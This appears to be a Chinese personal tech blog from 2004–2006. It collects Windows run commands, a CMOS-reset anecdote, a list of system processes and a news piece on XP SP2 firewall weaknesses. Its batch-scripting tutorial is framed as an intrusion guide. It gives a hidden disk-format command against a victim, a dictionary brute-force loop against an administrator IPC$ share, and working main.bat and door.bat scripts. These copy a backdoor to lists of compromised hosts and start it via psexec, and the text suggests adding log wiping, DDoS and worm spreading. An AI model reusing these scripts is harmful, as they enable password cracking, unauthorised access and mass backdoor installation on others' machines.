2006年11月06日

   explorer——-打开资源管理器
  Nslookup——-IP地址侦测器
  logoff———注销命令
  tsshutdn——-60秒倒计时关机命令
  lusrmgr.msc—-本机用户和组
  services.msc—本地服务设置
  oobe/msoobe /a—-检查XP是否激活
  notepad——–打开记事本
  cleanmgr——-垃圾整理
  net start messenger—-开始信使服务
  compmgmt.msc—计算机管理
  net stop messenger—–停止信使服务
  conf———–启动netmeeting
  dvdplay——–DVD播放器
  charmap——–启动字符映射表
  diskmgmt.msc—磁盘管理实用程序
  calc———–启动计算器
  dfrg.msc——-磁盘碎片整理程序
  chkdsk.exe—–Chkdsk磁盘检查
  devmgmt.msc— 设备管理器
  regsvr32 /u *.dll—-停止dll文件运行
  drwtsn32—— 系统医生
  rononce -p —-15秒关机
  dxdiag———检查DirectX信息
  regedt32——-注册表编辑器
  Msconfig.exe—系统配置实用程序
  rsop.msc——-组策略结果集
  mem.exe——–显示内存使用情况
  regedit.exe—-注册表
  winchat——–XP自带局域网聊天
  progman——–程序管理器
  winmsd———系统信息
  perfmon.msc—-计算机性能监测程序
  winver———检查Windows版本
  sfc /scannow—–扫描错误并复原
  taskmgr—–任务管理器(2000/xp/2003
  winver———检查Windows版本
  wmimgmt.msc—-打开windows管理体系结构(WMI)
  wupdmgr——–windows更新程序
  wscript——–windows脚本宿主设置
  write———-写字板
  winmsd———系统信息
  wiaacmgr——-扫描仪和照相机向导
  winchat——–XP自带局域网聊天
  mem.exe——–显示内存使用情况
  Msconfig.exe—系统配置实用程序
  mplayer2——-简易widnows media player
  mspaint——–画图板
  mstsc———-远程桌面连接
  mplayer2——-媒体播放机
  magnify——–放大镜实用程序
  mmc————打开控制台
  mobsync——–同步命令
  dxdiag———检查DirectX信息
  drwtsn32—— 系统医生
  devmgmt.msc— 设备管理器
  dfrg.msc——-磁盘碎片整理程序
  diskmgmt.msc—磁盘管理实用程序
  dcomcnfg——-打开系统组件服务
  ddeshare——-打开DDE共享设置
  dvdplay——–DVD播放器
  net stop messenger—–停止信使服务
  net start messenger—-开始信使服务
  notepad——–打开记事本
  nslookup——-网络管理的工具向导
  ntbackup——-系统备份和还原
  narrator——-屏幕“讲述人”
  ntmsmgr.msc—-移动存储管理器
  ntmsoprq.msc—移动存储管理员操作请求
  netstat -an—-(TC)命令检查接口
  syncapp——–创建一个公文包
  sysedit——–系统配置编辑器
  sigverif——-文件签名验证程序
  sndrec32——-录音机
  shrpubw——–创建共享文件夹
  secpol.msc—–本地安全策略
  services.msc—本地服务设置
  Sndvol32——-音量控制程序
  sfc.exe——–系统文件检查器
  sfc /scannow—windows文件保护
  tsshutdn——-60秒倒计时关机命令
  tourstart——xp简介(安装完成后出现的漫游xp程序)
  taskmgr——–任务管理器
  eventvwr——-事件查看器
  eudcedit——-造字程序
  explorer——-打开资源管理器
  packager——-对象包装程序
  perfmon.msc—-计算机性能监测程序
  progman——–程序管理器
  regedit.exe—-注册表
  rsop.msc——-组策略结果集
  regedt32——-注册表编辑器
  rononce -p —-15秒关机
  regsvr32 /u *.dll—-停止dll文件运行
  regsvr32 /u zipfldr.dll——取消ZIP支持
  cmd.exe——–CMD命令提示符
  chkdsk.exe—–Chkdsk磁盘检查
  certmgr.msc—-证书管理实用程序
  calc———–启动计算器
  charmap——–启动字符映射表
  cliconfg——-SQL SERVER 客户端网络实用程序
  Clipbrd——–剪贴板查看器
  conf———–启动netmeeting
  compmgmt.msc—计算机管理
  cleanmgr——-垃圾整理
  ciadv.msc——索引服务程序
  osk————打开屏幕键盘
  odbcad32——-ODBC数据源管理器
  oobe/msoobe /a—-检查XP是否激活
  lusrmgr.msc—-本机用户和组
  logoff———注销命令
  iexpress——-木马捆绑工具,系统自带
  Nslookup——-IP地址侦测器
  fsmgmt.msc—–共享文件夹管理器
  utilman——–辅助工具管理器
  gpedit.msc—–组策略

访问网络资源提示网络不存在或者尚未启动

现象:能上网,能PING通其他电脑,但是通过网上邻居和IP不能访问其他电脑上的资源。

处理办法:找到与自己系统相同的系统,进入SYSTEM32/DRIVERS文件夹,找到RDBSS.SYS和MRXSMB.SYS文件。拷备到自己系统的对应位置就可以了。启动WORKSTATION服务,
net start browser

2006年11月03日

1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。
语法
echo [{on|off}] [message]
Sample:echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite…
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)

3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

4.Rem 命令
注释命令,在C语言中相当与/*——–*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.

5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。

6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……

如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。

9.If 命令

if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文件名 待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。

10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I

如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

检查以 [drive:]path 为根的目录树,指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

或者,如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:

eol=c – 指一个行注释字符的结尾(就一个)
skip=n – 指在文件开始时忽略的行数。
delims=xxx – 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n – 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq – 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来
取得第二个符号,引用 %j 来取得第三个符号,引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用 usebackq 选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号,只要不试图说明一个高于字母 z 或
Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;
同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,
用单引号将括号之间的 filenameset 括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。

最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I – 删除任何引号("),扩充 %I
%~fI – 将 %I 扩充到一个完全合格的路径名
%~dI – 仅将 %I 扩充到一个驱动器号
%~pI – 仅将 %I 扩充到一个路径
%~nI – 仅将 %I 扩充到一个文件名
%~xI – 仅将 %I 扩充到一个文件扩展名
%~sI – 扩充的路径只含有短名
%~aI – 将 %I 扩充到文件的文件属性
%~tI – 将 %I 扩充到文件的日期/时间
%~zI – 将 %I 扩充到文件的大小
%~$PATH:I – 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串

可以组合修饰符来得到多重结果:

%~dpI – 仅将 %I 扩充到一个驱动器号和路径
%~nxI – 仅将 %I 扩充到一个文件名和扩展名
%~fsI – 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i – 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI – 将 %I 扩充到类似输出线路的 DIR

在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2:

利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。

sample3:

你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。

主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:

————— cut here then save as a batchfile(I call it main.bat ) ——————–
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
————— cut here then save as a batchfile(I call it main.bat ) ——————–

——————- cut here then save as a batchfile(I call it door.bat) —————–
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
—————– cut here then save as a batchfile(I call it door.bat) ——————-
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

有关某个命令的详细信息,请键入 HELP 命令名
ASSOC 显示或修改文件扩展名关联。
AT 计划在计算机上运行的命令和程序。
ATTRIB 显示或更改文件属性。
BREAK 设置或清除扩展式 CTRL+C 检查。
CACLS 显示或修改文件的访问控制列表(ACLs)。
CALL 从另一个批处理程序调用这一个。
CD 显示当前目录的名称或将其更改。
CHCP 显示或设置活动代码页数。
CHDIR 显示当前目录的名称或将其更改。
CHKDSK 检查磁盘并显示状态报告。
CHKNTFS 显示或修改启动时间磁盘检查。
CLS 清除屏幕。
CMD 打开另一个 Windows 命令解释程序窗口。
COLOR 设置默认控制台前景和背景颜色。
COMP 比较两个或两套文件的内容。
COMPACT 显示或更改 NTFS 分区上文件的压缩。
CONVERT 将 FAT 卷转换成 NTFS。您不能转换
当前驱动器。
COPY 将至少一个文件复制到另一个位置。
DATE 显示或设置日期。
DEL 删除至少一个文件。
DIR 显示一个目录中的文件和子目录。
DISKCOMP 比较两个软盘的内容。
DISKCOPY 将一个软盘的内容复制到另一个软盘。
DOSKEY 编辑命令行、调用 Windows 命令并创建宏。
ECHO 显示消息,或将命令回显打开或关上。
ENDLOCAL 结束批文件中环境更改的本地化。
ERASE 删除至少一个文件。
EXIT 退出 CMD.EXE 程序(命令解释程序)。
FC 比较两个或两套文件,并显示
不同处。
FIND 在文件中搜索文字字符串。
FINDSTR 在文件中搜索字符串。
FOR 为一套文件中的每个文件运行一个指定的命令。
FORMAT 格式化磁盘,以便跟 Windows 使用。
FTYPE 显示或修改用于文件扩展名关联的文件类型。
GOTO 将 Windows 命令解释程序指向批处理程序
中某个标明的行。
GRAFTABL 启用 Windows 来以图像模式显示
扩展字符集。
HELP 提供 Windows 命令的帮助信息。
IF 执行批处理程序中的条件性处理。
LABEL 创建、更改或删除磁盘的卷标。
MD 创建目录。
MKDIR 创建目录。
MODE 配置系统设备。
MORE 一次显示一个结果屏幕。
MOVE 将文件从一个目录移到另一个目录。
PATH 显示或设置可执行文件的搜索路径。
PAUSE 暂停批文件的处理并显示消息。
POPD 还原 PUSHD 保存的当前目录的上一个值。
PRINT 打印文本文件。
PROMPT 更改 Windows 命令提示符。
PUSHD 保存当前目录,然后对其进行更改。
RD 删除目录。
RECOVER 从有问题的磁盘恢复可读信息。
REM 记录批文件或 CONFIG.SYS 中的注释。
REN 重命名文件。
RENAME 重命名文件。
REPLACE 替换文件。
RMDIR 删除目录。
SET 显示、设置或删除 Windows 环境变量。
SETLOCAL 开始批文件中环境更改的本地化。
SHIFT 更换批文件中可替换参数的位置。
SORT 对输入进行分类。
START 启动另一个窗口来运行指定的程序或命令。
SUBST 将路径跟一个驱动器号关联。
TIME 显示或设置系统时间。
TITLE 设置 CMD.EXE 会话的窗口标题。
TREE 以图形模式显示驱动器或路径的目录结构。
TYPE 显示文本文件的内容。
VER 显示 Windows 版本。
VERIFY 告诉 Windows 是否验证文件是否已正确
写入磁盘。
VOL 显示磁盘卷标和序列号。
XCOPY 复制文件和目录树。

appwiz.cpl————添加删除程序

control userpasswords2——–用户帐户设置

cleanmgr——-垃圾整理

CMD————–命令提示符可以当作是 Windows 的一个附件,Ping,Convert 这些不能在图形环境下 使用的功能要借助它来完成。

cmd——jview察看Java虚拟机版本。

command.com——调用的则是系统内置的 NTVDM,一个 DOS虚拟机。它完全是一个类似 Virtual PC 的 虚拟环境,和系统本身联系不大。当我们在命令提示符下运行 DOS 程序时,实际上也 是自动转移到 NTVDM虚拟机下,和 CMD 本身没什么关系。

calc———–启动计算器

chkdsk.exe—–Chkdsk磁盘检查

compmgmt.msc—计算机管理

conf———–启动 netmeeting

control userpasswords2—–User Account 权限设置

devmgmt.msc— 设备管理器

diskmgmt.msc—磁盘管理实用程序

dfrg.msc——-磁盘碎片整理程序

drwtsn32—— 系统医生

dvdplay——–启动Media Player

dxdiag———–DirectX Diagnostic Tool

gpedit.msc——-组策略编辑器

gpupdate /target:computer /force 强制刷新组策略

eventvwr.exe—–事件查看器

explorer——-打开资源管理器

logoff———注销命令

lusrmgr.msc—-本机用户和组

msinfo32———系统信息

msconfig———系统配置实用程序

net start (servicename)—-启动该服务

net stop (servicename)—–停止该服务

notepad——–打开记事本

nusrmgr.cpl——-同control userpasswords,打开用户帐户控制面板

Nslookup——-IP地址侦测器

oobe/msoobe /a—-检查XP是否激活

perfmon.msc—-计算机性能监测程序

progman——–程序管理器

regedit———-注册表编辑器

regedt32——-注册表编辑器

regsvr32 /u *.dll—-停止dll文件运行

route print——查看路由表

rononce -p —-15秒关机

rsop.msc——-组策略结果集

rundll32.exe rundll32.exe %Systemroot%System32shimgvw.dll,ImageView_Fullscreen—-启动一个空白的Windows 图片和传真查看器

secpol.msc——–本地安全策略

services.msc—本地服务设置

sfc /scannow—–启动系统文件检查器

sndrec32——-录音机

taskmgr—–任务管理器(适用于2000/xp/2003)

tsshutdn——-60秒倒计时关机命令

winchat——–XP自带局域网聊天

winmsd———系统信息

winver—–显示About Windows 窗口

wupdmgr———–Windows Update

2005年05月20日

     最近碰到几台老机,闲置一些时间后出现问题,表现为电源指示灯不亮,显示器无反应,主机电浮夸风 扇不转。重试几次后,仍然无任何反应。
    据以往经验,打开这十多台电脑的机箱,将主板上的CMOS放电,重新开机后仍无反应。又怀疑是不是电源问题,用一个好的电源换上,也没有反应。把出问题的电脑的电源拆下来装在好的机子上能政党工作,说明不是电源的问题。但如果是BIOS的问题,对主板CMOS放电一下,一般都可以解决。问题到底出在哪儿呢?
    后来在网上浏览时看到一篇给主板CMOS放电的方法解决问题的文章,里面提到了放电时间是30秒。给主板放电还要考虑时间长短?带着这个疑问又查看了一些有关文章,发现有些文章提到了放电时间,有的是30秒,有的是三分钟,有的是五分,十分的,还有一篇文章是说放电时间竟是两个小时。而自己平时给主板放电一般只有几秒,最多十几秒,有时为了省事,只把电池取出用螺丝刀短接几下就算了。
    是不是因为给主板CMOS放电的时间太少了,没有彻底放电?想到这里,赶紧把有问题的电脑重新放电,这次每台电脑放电时间足有5分钟,装好后重新开机,“嘀”的一下,嘿嘿,,,可爱的WIN98蓝天白云又出现了。于是用这个方法搞定了几台,还有一台不行。刚好下班时间到,,,嘿,人还是要休息的嘛。
于是,将主板CMOS短接后,,下班~~第二天早上上班时,一开机,,呵,好了。
    希望能给大家个提醒,有很多问题只要给主板CMOS彻底放电都能解决的。

本人文化有限,如有错字,还请大家多多原谅啊。

2005年02月05日

进程名 描述

最基本的系统进程(也就是说,这些进程是系统运行的基本条件,有了这些进程,系统就能正常运行)

smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务) 产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务) ->netlogon
svchost.exe 包含很多系统服务 !!!->eventsystem,(SPOOLSV.EXE 将文件加载到内存中以便迟后打印。)
explorer.exe 资源管理器 (internat.exe 托盘区的拼音图标)

====================================================================

附加的系统进程(这些进程不是必要的,你可以根据需要通过服务管理器来增加或减少)

mstask.exe 允许程序在指定时间运行。(系统服务)->schedule
regsvc.exe 允许远程注册表操作。(系统服务)->remoteregister
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe->msftpsvc,w3svc,iisadmn
tlntsvr.exe->tlnrsvr
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务的一部分。(系统服务)
termsrv.exe ->termservice
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)

=================================================================
以下全是系统服务,并且很少会用到,如果你暂时用不着,应该关掉(对安全有害 )

tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional
的能力。(系统服务)->simptcp 支持以下 TCP/IP 服务:Character Generator, Daytime,
Discard, Echo, 以及 Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库.->rpclocator(区 RpcSs)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或阌蛲穆呒怼?系统服务)
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。(系统服务)
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护
资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)!!!
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功
能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的操作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,
以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息,然后将消息传递到运行在
这台计算机上 SNMP 管理程序。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)

总结:
发现可疑进程的秘诀就是要多看任务管理器中的进程列表,看多了以后,一眼就可以发现可
疑进程,就象找一群熟悉人中的陌生人一样

 以上是我在网上搜的,觉得不错,大家分享~

2004年11月12日

微软在前一段时间终于发布了WindowsXP SP2,在SP2中,微软提供了一个新的功能强大的防火墙软件,用以代替WindowsXP原有简单的Internet连接防火墙。新的防火墙软件在安装后会自动开启,这样对于很多普通PC用户来说,可以有效的阻止病毒和木马等向电脑的渗透传播。然而,一些安全专家近日指出,微软防火墙还存在一些漏洞,对于一些对安全性要求较高的重要场合,微软防火墙并不适用。


在分析了一些防火墙软件之后,aQuantive公司的信息安全主管杰夫指出:与第三方供应商提供的防火墙相比,微软防火墙在防护的健壮性上还是要稍差一些。


PcWorlds在近日发表文章指出,微软WindowsXP SP2防火墙目前存在两个漏洞。


1.防火墙无法阻止计算机向外发送报文


绝大多数商业防火墙都提供了应用程序过滤功能,这一功能可以阻止未通过认证的应用程序向外发送报文,这样就可以防止病毒或木马等恶意代码同外部建立未认证的连接,同时也可以防止用户的计算机被黑客用做分布式攻击的跳板。然而,windowsXP SP2所带的防火墙却只能对进入计算机的报文进行过滤,而不对计算机向外发出的报文进行过滤,它不对应用程序向外发送报文做任何限制。


2.防火墙可以被其他一些应用程序关闭


大多数第三方防火墙软件提供商如Zone Labs、McAfee和Symantec公司都将在近期提供和SP2兼容的新版本防火墙软件。这些新版软件在安装的时候会自动禁用Windows防火墙,而在卸载时又会自动启用Windows防火墙。第三方厂商通过调用Windows Firewall API来实现这一功能。然而,既然防火墙软件可以这么做,其他病毒或木马等恶意代码就同样也可以。病毒或木马可以修改Windows防火墙程序,甚至干脆关闭它。而Zone Labs公司声明,他们采取了一些锁定技术来保证他们的防火墙软件不会被其他第三方软件关闭,除非你将整个防火墙卸载掉。


微软承认了以上的这些现象确实在某些情况下会存在,然而,他们认为这并不是防火墙的漏洞,根据微软的说法,这是由防火墙的特性所决定的。微软的安全技术专家大卫·埃弗顿指出,一些恶意代码可以关闭防火墙或同外部建立连接,但这是在你安装防火墙前已经被感染的前提下才可能会出现的。他解释说,Windows防火墙是被设计用来过滤个人电脑所接收到的报文,而不是在你的计算机被感染后还能保护你的电脑。如果有病毒使用某些方法绕过了防火墙,那应该是由杀毒软件来保护你的计算机。同样的,对于防火墙软件来说,阻止恶意代码向外发送报文并不是它的职责。微软建议大家使用其他方法来检查或过滤向外发送的流量。


“防火墙软件只是一个用于计算机管理的程序,并不是一个防止病毒的灵丹妙药。”埃弗顿说。同时他指出,根据微软公司的调查显示,如果需要用户来确认所有的应用程序是否可以访问Internet,那样可能会造成适得其反的效果。“如果你反复的让用户去确认这类的信息,那么最终的结果就是他们会一直选Yes。”然而,其他第三方防火墙软件提供商说,他们可以提供不同的方法来解决这个问题。比如McAfee公司就设计了白名单功能,他定时更新可以信任的程序的白名单,这样就可以减少用户确认的次数。


安全漏洞评估厂商PivX方案公司的高级安全研究人员托尔·拉霍姆于本周三表示,有关Windows XP SP2中出现的漏洞问题还会有更多有待披露中。自Windows XP SP2发布以来,拉霍姆就一直在寻找Windows XP SP2中的漏洞,并已经向微软公司通报了几个问题,但他没有详述有关其中的细节问题。他表示,在未来的几个周内,我们肯定能够看到Windows XP SP2出现的危急漏洞,并且在未来几个月内,蠕虫病毒将能够躲避Windows XP SP2安全功能的查杀。


安全研究人员还指出了微软公司集成在Windows XP SP2中的安全技术并未能解决一些众所周知的问题。据安全软件厂商eEye数字安全公司负责黑客事务的首席官员马克·迈弗雷特表示,尽管提高了防火墙的功能,但它仍然能够绕过任意一个在本地机上运行的软件,这也是大多数个人防火墙存在的问题。这些有关漏洞方面的报告可能会使企业对安装Windows XP SP2的决定向后推移。许多企业都已经表示,在完全的测试前,它们不会安装Windows XP SP2的。


